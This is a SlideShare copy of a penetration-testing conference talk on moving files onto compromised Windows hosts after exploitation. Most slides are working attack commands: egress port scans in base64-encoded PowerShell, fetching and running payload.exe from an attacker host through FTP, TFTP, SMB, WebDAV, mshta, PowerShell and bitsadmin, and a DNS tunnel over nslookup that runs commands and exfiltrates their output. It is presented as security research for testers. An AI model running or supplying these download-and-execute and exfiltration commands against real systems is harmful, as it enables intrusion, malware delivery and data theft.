Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Windows File Uploading Outof the Box[post exploitation]Vyacheslav YegoshinPositive TechnologiesPHDAYS III
[whoami]http://github.com/nxnrt/WindowsUploadToolkitVyacheslav Yegoshin- Penetration tester- SCADAStrangeLove team member
[Problem]
[OSes] .NET 3.5 Integrated/UAC/etc.
[Utilities and tools]― FTP― TFTP― Telnet― JScript/VBScript― Windows Script File― MSHTA― Samba― WebDAV― PowerShell― BITSADM...
[Egress Firewall Test]- Check all TCP ports- Check all UDP ports
[Egress Firewall][Windows XP & 2003]- Bruteforce all TCP ports on Pentest with telnetFOR /L %i IN (1,1,65535) DO (cmd /c "...
[Egress Firewall][Windows XP & 2003]- Bruteforce all TCP ports on Pentest with telnet- Bruteforce all UDP ports on Pentest...
[Egress Firewall][Incoming connection]- Capture your traffic with TCPdump!tcpdump –n 5.5.5.5
[Egress Firewall][Windows XP & 2003]Influence:~ 400 telnet.exe processes~ 700 MB RAM is used~ 30 min TCP scan~ 30 min UDP ...
dism /online /enable-feature /featurename:TelnetClient[Egress TCP][Windows Vista and Later]- Bruteforce all TCP ports on P...
powershell –encodedCommandZnVuY3Rpb24gc1QoJElQLCRQb3J0KSB7JEFkZHJlc3MgPSBbc3lzdGVtLm5ldC5JUEFkZHJlc3NdOjpQYXJzZSgkSVApOyRF...
[Egress TCP][Windows Vista and Later]function sT($IP,$Port) {$Address = [system.net.IPAddress]::Parse($IP)$End = New-Objec...
[Egress UDP][Windows Vista and Later]- Bruteforce all UDP ports on Pentest with PowerShell- nslookup “set port” option doe...
[Egress UDP][Windows Vista and Later]Base64 decodefunction sU($IP, [int]$Port){$Address = [system.net.IPAddress]::Parse($I...
[Egress TCP&UDP][Windows Vista and Later]Minor Influence:- 1 powershell.exe process~ 100 MB RAM is used~ 40 min TCP scan~ ...
[Telnet]mode CON COLS=2000 && telnet -f c:payload.vbs 1.2.3.4 53Max line length Path to savenc -q 20 -lvp 53 < payload.vbs...
[Telnet] Only ASCII symbols: HEX is our choice!
[FTP]Any TCP open- Script file must exist- FTP client built in all Windows versions
[FTP]Create script file payload.txt:open 1.2.3.4 3128quote pasvbinaryget payload.exe c:payload.exebye service start pure-f...
[TFTP]69/UDP opendism /online /enable-feature /featurename:TFTP- Use only UDP protocol- TFTP client is Disabled by design ...
[TFTP]69/UDP opentftp –i 1.2.3.4 GET payload.exeatftpd --daemon --port 69 /tmp
[Samba]445/TCP open+ No writable directory+ No command output- Proxy isn‟t supported- 445/tcp only
[Samba]net use X: 1.2.3.4445/TCP openstart x:payload.exeservice smbd start
[JScript/VBScript]Any TCP open― Encode EXE to script― Use protocols: SMTP, FTP, LDAP …― Script file must exist: .js, .jse,...
[JScript/VBScript]telnet –f payload.js 1.2.3.4 53Any TCP opennc -q 20 -lvp 53 < payload.jscscript payload.js
[JScript/VBScript]telnet –f payload.js 1.2.3.4 53 & cscript payload.jsWhy not?Press any key
[JScript/VBScript]cscript 1.2.3.4payload.jsAny TCP openservice smbd start
[Windows Script File]― XML document― Script file must exist: .wsf, .wse― JScript and VBScript― External scripts― Encode EX...
[Windows Script File][Link external script]cscript payload.wsfAny TCP open<job><script language="VBScript" src="http://1.2...
[Windows Script File]― Any2Bat (zzzEVAzzz)p.exe Make p.cab<package><cab xmlns:dt="urn:schemas-microsoft-com:datatypes"dt:d...
[Windows Script File]― Any2Bat. Now in PowerShell!• Make-CabFile –Path• Convert-Cab2Base64 –CabPath• Convert-Cab2WSF –CabE...
[Windows Script File]DEMO
[MSHTA]― No browser security zones― Argument: URL or Script• JScript• VBScript― No UAC― Parse text on the fly
[MSHTA]mshta http(s)://pastebin.com:80/raw.php?i=5W6JtsUumshta ftp://1.2.3.4:21/payload.jpgmshta 1.2.3.4payload.jsAny TCP ...
[MSHTA]mshta vbscript:Execute("WScript.Echo 1")mshta javascript:Execute("WScript.Echo(1);")Any TCP open
[NSLOOKUP]no tcp/udp open― Get DNS Records:• IP -> Domain name (PTR)• Domain name -> IP (A and AAAA)• Get TXT record (TXT)
[NSLOOKUP]TARGETIP: 192.168.1.10Firewall/NATInternal IP: 192.168.1.1External IP: 5.5.5.5PENTESTIP: 1.2.3.4Remote Command E...
[NSLOOKUP][Get file]TXT = 1x“ & echo dir ”c:Program Files” >> p.bat & ”Name server:rce.pentest.comTARGETIP: 192.168.1.10ns...
[NSLOOKUP][Get file]TARGETIP: 192.168.1.10Source p.batValid command
[NSLOOKUP][Send]Name server:rce.pentest.comTARGETIP: 192.168.1.10PoC: FOR /F %I IN (ipconfig /all) DO nslookup%I.rce.pente...
[NSLOOKUP][Send]mshta "javascript:functionh(out){hxd=;for(a=0;a<out.length;a=a+1){hxd=hxd+out.charCodeAt(a).toString(16);}...
[NSLOOKUP][Send]Read command STDOUTExample command: dirConvert to HEX.match(/.{1,60}/g);j,valj + ”x” + val + “.pentest.com...
use auxiliary/server/fakedns[NSLOOKUP][Send]no tcp/udp openwhere powershell
[NSLOOKUP][Send file]DEMO
[WebDAV] [Samba]Any TCP open+ No writable directory+ No command output+ Proxy+ Any tcp open+ SSL+ No writable directory+ N...
[WebDAV][Windows XP SP3 or KB892211]Any TCP opennet use X:http(s)://1.2.3.4/webdav1.2.3.4webdav1.2.3.4@SSLwebdav1.2.3.4@SS...
[PowerShell]Any TCP open― C# code― Any application level protocol― Encoded commands― Simple and it‟s work!Any TCP open
[PowerShell]Any TCP open(New-Object System.Net.WebClient).DownloadFile("http://1.2.3.4:80/payload.exe","c:payload.exe")ser...
[BITSADMIN][Windows 2003 SP1 and later]Any TCP openbitsadmin /transfer whatever http://1.2.3.4:80/payload.exec:payload.exe...
[BITSADMIN][Windows 2003 SP1 and later]Any TCP openbitsadmin /CREATE /DOWNLOAD jobnamebitsadmin /ADDFILE jobname http://1....
[Special tnx]—Gleb Gritsai—Sergey Gordeychik
Questions?http://github.com/nxnrt/WindowsUploadToolkit@vegoshinvegoshin@ptsecurity.com
Phd3
Phd3
Upcoming SlideShare
Loading in …5
×

Phd3

2,796 views

Published on

  • Be the first to comment

Phd3

  1. 1. Windows File Uploading Outof the Box[post exploitation]Vyacheslav YegoshinPositive TechnologiesPHDAYS III
  2. 2. [whoami]http://github.com/nxnrt/WindowsUploadToolkitVyacheslav Yegoshin- Penetration tester- SCADAStrangeLove team member
  3. 3. [Problem]
  4. 4. [OSes] .NET 3.5 Integrated/UAC/etc.
  5. 5. [Utilities and tools]― FTP― TFTP― Telnet― JScript/VBScript― Windows Script File― MSHTA― Samba― WebDAV― PowerShell― BITSADMIN― NSLOOKUP― …
  6. 6. [Egress Firewall Test]- Check all TCP ports- Check all UDP ports
  7. 7. [Egress Firewall][Windows XP & 2003]- Bruteforce all TCP ports on Pentest with telnetFOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i"
  8. 8. [Egress Firewall][Windows XP & 2003]- Bruteforce all TCP ports on Pentest with telnet- Bruteforce all UDP ports on Pentest with nslookupFOR /L %i IN (1,1,4096) DO (cmd /c "start /b telnet 1.2.3.4 %i")FOR /L %i IN (1,1,4096) DO (cmd /c "start /b nslookup -port=%i ya.ru 1.2.3.4")
  9. 9. [Egress Firewall][Incoming connection]- Capture your traffic with TCPdump!tcpdump –n 5.5.5.5
  10. 10. [Egress Firewall][Windows XP & 2003]Influence:~ 400 telnet.exe processes~ 700 MB RAM is used~ 30 min TCP scan~ 30 min UDP scan
  11. 11. dism /online /enable-feature /featurename:TelnetClient[Egress TCP][Windows Vista and Later]- Bruteforce all TCP ports on Pentest with PowerShell- Telnet client is Disabled by design :( but if we can it run withelevated permissions …
  12. 12. powershell –encodedCommandZnVuY3Rpb24gc1QoJElQLCRQb3J0KSB7JEFkZHJlc3MgPSBbc3lzdGVtLm5ldC5JUEFkZHJlc3NdOjpQYXJzZSgkSVApOyRFbmQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuSVBFbmRQb2ludCAkYWRkcmVzcywgJHBvcnQ7JFNhZGRyZiA9IFtTeXN0ZW0uTmV0LlNvY2tldHMuQWRkcmVzc0ZhbWlseV06OkludGVyTmV0d29yazskU3R5cGUgPSBbU3lzdGVtLk5ldC5Tb2NrZXRzLlNvY2tldFR5cGVdOjpTdHJlYW07JFB0eXBlID0gW1N5c3RlbS5OZXQuU29ja2V0cy5Qcm90b2NvbFR5cGVdOjpUQ1A7JFNvY2sgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5Tb2NrZXQgJHNhZGRyZiwgJHN0eXBlLCAkcHR5cGU7JFNvY2suVFRMID0gMjY7dHJ5IHsgJHNvY2suQ29ubmVjdCgkRW5kKTtbQnl0ZVtdXSAkTWVzc2FnZSA9IFtjaGFyW11dIncwMHR3MDB0IjskU2VudCA9ICRTb2NrLlNlbmQoJE1lc3NhZ2UpOyRzb2NrLkVuZENvbm5lY3QoJENvbm5lY3QpfSBjYXRjaCB7fTskU29jay5DbG9zZSgpO307MS4uNjU1MzUgfCAleyBzVCAtSVAgIjEuMi4zLjQiIC1Qb3J0ICRfIH0=[Egress TCP][Windows Vista and Later]- Bruteforce all TCP ports on Pentest with PowerShell
  13. 13. [Egress TCP][Windows Vista and Later]function sT($IP,$Port) {$Address = [system.net.IPAddress]::Parse($IP)$End = New-Object System.Net.IPEndPoint $address, $port$Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork$Stype = [System.Net.Sockets.SocketType]::Stream$Ptype = [System.Net.Sockets.ProtocolType]::TCP$Sock = New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype$Sock.TTL = 26try {$sock.Connect($End)[Byte[]] $Message = [char[]]"w00tw00t“$Sent = $Sock.Send($Message)$sock.EndConnect($Connect)} catch {}$Sock.Close()}1..65535 | %{ sT -IP "1.2.3.4" -Port $_ };Base64 decode
  14. 14. [Egress UDP][Windows Vista and Later]- Bruteforce all UDP ports on Pentest with PowerShell- nslookup “set port” option doesn‟t work! :(powershell –encodedCommandZnVuY3Rpb24gc1UoJElQLCBbaW50XSRQb3J0KXskQWRkcmVzcyA9IFtzeXN0ZW0ubmV0LklQQWRkcmVzc106OlBhcnNlKCRJUCk7JEVuZCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5JUEVuZFBvaW50KCRBZGRyZXNzLCAkcG9ydCk7JFNhZGRyZj1bU3lzdGVtLk5ldC5Tb2NrZXRzLkFkZHJlc3NGYW1pbHldOjpJbnRlck5ldHdvcms7JFN0eXBlPVtTeXN0ZW0uTmV0LlNvY2tldHMuU29ja2V0VHlwZV06OkRncmFtOyRQdHlwZT1bU3lzdGVtLk5ldC5Tb2NrZXRzLlByb3RvY29sVHlwZV06OlVEUDskU29jaz1OZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5Tb2NrZXQgJHNhZGRyZiwgJHN0eXBlLCAkcHR5cGU7JFNvY2suVFRMID0gMjY7JHNvY2suQ29ubmVjdCgkZW5kKTskRW5jPVtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJOyRNZXNzYWdlID0gIncwMHR3MDB0IjskQnVmZmVyPSRFbmMuR2V0Qnl0ZXMoJE1lc3NhZ2UpOyRTZW50PSRTb2NrLlNlbmQoJEJ1ZmZlcik7fTsgMS4uNjU1MzUgfCAleyBzVSAtSVAgIjEuMi4zLjQiIC1Qb3J0ICRfIH0=
  15. 15. [Egress UDP][Windows Vista and Later]Base64 decodefunction sU($IP, [int]$Port){$Address = [system.net.IPAddress]::Parse($IP)$End = New-Object System.Net.IPEndPoint($Address, $port)$Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork$Stype = [System.Net.Sockets.SocketType]::Dgram$Ptype = [System.Net.Sockets.ProtocolType]::UDP$Sock = New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype$Sock.TTL = 26$sock.Connect($end)$Enc = [System.Text.Encoding]::ASCII$Message = "w00tw00t“$Buffer = $Enc.GetBytes($Message)$Sent = $Sock.Send($Buffer)}1..65535 | %{ sU -IP "1.2.3.4" -Port $_ }
  16. 16. [Egress TCP&UDP][Windows Vista and Later]Minor Influence:- 1 powershell.exe process~ 100 MB RAM is used~ 40 min TCP scan~ 40 min UDP scan
  17. 17. [Telnet]mode CON COLS=2000 && telnet -f c:payload.vbs 1.2.3.4 53Max line length Path to savenc -q 20 -lvp 53 < payload.vbsAny TCP open
  18. 18. [Telnet] Only ASCII symbols: HEX is our choice!
  19. 19. [FTP]Any TCP open- Script file must exist- FTP client built in all Windows versions
  20. 20. [FTP]Create script file payload.txt:open 1.2.3.4 3128quote pasvbinaryget payload.exe c:payload.exebye service start pure-ftpdAny TCP openftp –i–s:payload.txt
  21. 21. [TFTP]69/UDP opendism /online /enable-feature /featurename:TFTP- Use only UDP protocol- TFTP client is Disabled by design :( but if we can run it withelevated permissions …
  22. 22. [TFTP]69/UDP opentftp –i 1.2.3.4 GET payload.exeatftpd --daemon --port 69 /tmp
  23. 23. [Samba]445/TCP open+ No writable directory+ No command output- Proxy isn‟t supported- 445/tcp only
  24. 24. [Samba]net use X: 1.2.3.4445/TCP openstart x:payload.exeservice smbd start
  25. 25. [JScript/VBScript]Any TCP open― Encode EXE to script― Use protocols: SMTP, FTP, LDAP …― Script file must exist: .js, .jse, .vbs, .vse― JScript vs VBScript― cscript vs wscript
  26. 26. [JScript/VBScript]telnet –f payload.js 1.2.3.4 53Any TCP opennc -q 20 -lvp 53 < payload.jscscript payload.js
  27. 27. [JScript/VBScript]telnet –f payload.js 1.2.3.4 53 & cscript payload.jsWhy not?Press any key
  28. 28. [JScript/VBScript]cscript 1.2.3.4payload.jsAny TCP openservice smbd start
  29. 29. [Windows Script File]― XML document― Script file must exist: .wsf, .wse― JScript and VBScript― External scripts― Encode EXE to WSF
  30. 30. [Windows Script File][Link external script]cscript payload.wsfAny TCP open<job><script language="VBScript" src="http://1.2.3.4:80/payload.vbs"></script></job><job><script language="VBScript" src=“ftp://1.2.3.4:21/payload.vbs"></script></job><job><script language="VBScript" src=“1.2.3.4payload.vbs"></script></job>
  31. 31. [Windows Script File]― Any2Bat (zzzEVAzzz)p.exe Make p.cab<package><cab xmlns:dt="urn:schemas-microsoft-com:datatypes"dt:dt="bin.base64"></cab><job><script language=„VBScript‟>…</script></job></package>Read p.cab and Base64encodeConvert to BAT: echo … >> payload.wsfInserthere
  32. 32. [Windows Script File]― Any2Bat. Now in PowerShell!• Make-CabFile –Path• Convert-Cab2Base64 –CabPath• Convert-Cab2WSF –CabEncode• Convert-Cab2Bat -CabEncodeMake-CabFile –Path c:payload.exe | Convert-Cab2WSFMake-CabFile –Path c:payload.exe | Convert-Cab2Bat
  33. 33. [Windows Script File]DEMO
  34. 34. [MSHTA]― No browser security zones― Argument: URL or Script• JScript• VBScript― No UAC― Parse text on the fly
  35. 35. [MSHTA]mshta http(s)://pastebin.com:80/raw.php?i=5W6JtsUumshta ftp://1.2.3.4:21/payload.jpgmshta 1.2.3.4payload.jsAny TCP open
  36. 36. [MSHTA]mshta vbscript:Execute("WScript.Echo 1")mshta javascript:Execute("WScript.Echo(1);")Any TCP open
  37. 37. [NSLOOKUP]no tcp/udp open― Get DNS Records:• IP -> Domain name (PTR)• Domain name -> IP (A and AAAA)• Get TXT record (TXT)
  38. 38. [NSLOOKUP]TARGETIP: 192.168.1.10Firewall/NATInternal IP: 192.168.1.1External IP: 5.5.5.5PENTESTIP: 1.2.3.4Remote Command ExecutionName server:pentest.comInternal primary DNSResponseno tcp/udp openGet all TXT records fromrce.pentest.com
  39. 39. [NSLOOKUP][Get file]TXT = 1x“ & echo dir ”c:Program Files” >> p.bat & ”Name server:rce.pentest.comTARGETIP: 192.168.1.10nslookup –type=TXT rce.pentest.com > run.bat &run.bat
  40. 40. [NSLOOKUP][Get file]TARGETIP: 192.168.1.10Source p.batValid command
  41. 41. [NSLOOKUP][Send]Name server:rce.pentest.comTARGETIP: 192.168.1.10PoC: FOR /F %I IN (ipconfig /all) DO nslookup%I.rce.pentest.comDNS server logging
  42. 42. [NSLOOKUP][Send]mshta "javascript:functionh(out){hxd=;for(a=0;a<out.length;a=a+1){hxd=hxd+out.charCodeAt(a).toString(16);}return hxd;}function r(cmd){varshell=new ActiveXObject(WScript.Shell);varse=shell.Exec(cmd);var out =;while(!(se.StdOut.AtEndOfStream)){out=out+se.StdOut.ReadLine();}return out;}function ex(cmd){varout=h(r(cmd));query=out.match(/.{1,60}/g);for(v=0;v<query.length;v=v+1){r(nslookup+v+x+query[v]+.pentest.com)};}functione(){ex(dir);}window.onload=e"
  43. 43. [NSLOOKUP][Send]Read command STDOUTExample command: dirConvert to HEX.match(/.{1,60}/g);j,valj + ”x” + val + “.pentest.com”nslookup 0x417070446174614170706c69636174696f6e5c2044617461436f6e746163.pentest.comnslookup 1x7473436f6f6b6965734465736b746f70446f63756d656e7473446f776e6c.pentest.comnslookup 2x6f61647344726f70626f784661766f72697465734c696e6b734c6f63616c.pentest.com
  44. 44. use auxiliary/server/fakedns[NSLOOKUP][Send]no tcp/udp openwhere powershell
  45. 45. [NSLOOKUP][Send file]DEMO
  46. 46. [WebDAV] [Samba]Any TCP open+ No writable directory+ No command output+ Proxy+ Any tcp open+ SSL+ No writable directory+ No command output- Proxy doesn‟t supported- 445/tcp onlyvs.Any TCP open
  47. 47. [WebDAV][Windows XP SP3 or KB892211]Any TCP opennet use X:http(s)://1.2.3.4/webdav1.2.3.4webdav1.2.3.4@SSLwebdav1.2.3.4@SSL@5443webdav1.2.3.4@53webdavApache WebDAV moduleAny TCP open
  48. 48. [PowerShell]Any TCP open― C# code― Any application level protocol― Encoded commands― Simple and it‟s work!Any TCP open
  49. 49. [PowerShell]Any TCP open(New-Object System.Net.WebClient).DownloadFile("http://1.2.3.4:80/payload.exe","c:payload.exe")service apache2 startAny TCP open
  50. 50. [BITSADMIN][Windows 2003 SP1 and later]Any TCP openbitsadmin /transfer whatever http://1.2.3.4:80/payload.exec:payload.exeservice apache2 startAny TCP open
  51. 51. [BITSADMIN][Windows 2003 SP1 and later]Any TCP openbitsadmin /CREATE /DOWNLOAD jobnamebitsadmin /ADDFILE jobname http://1.2.3.4/payload1.exe p1.exebitsadmin /ADDFILE jobname http://1.2.3.4/payload2.exe p2.exe…bitsadmin /RESUME jobnamebitsadmin /COMPLETE jobnameAny TCP open
  52. 52. [Special tnx]—Gleb Gritsai—Sergey Gordeychik
  53. 53. Questions?http://github.com/nxnrt/WindowsUploadToolkit@vegoshinvegoshin@ptsecurity.com

×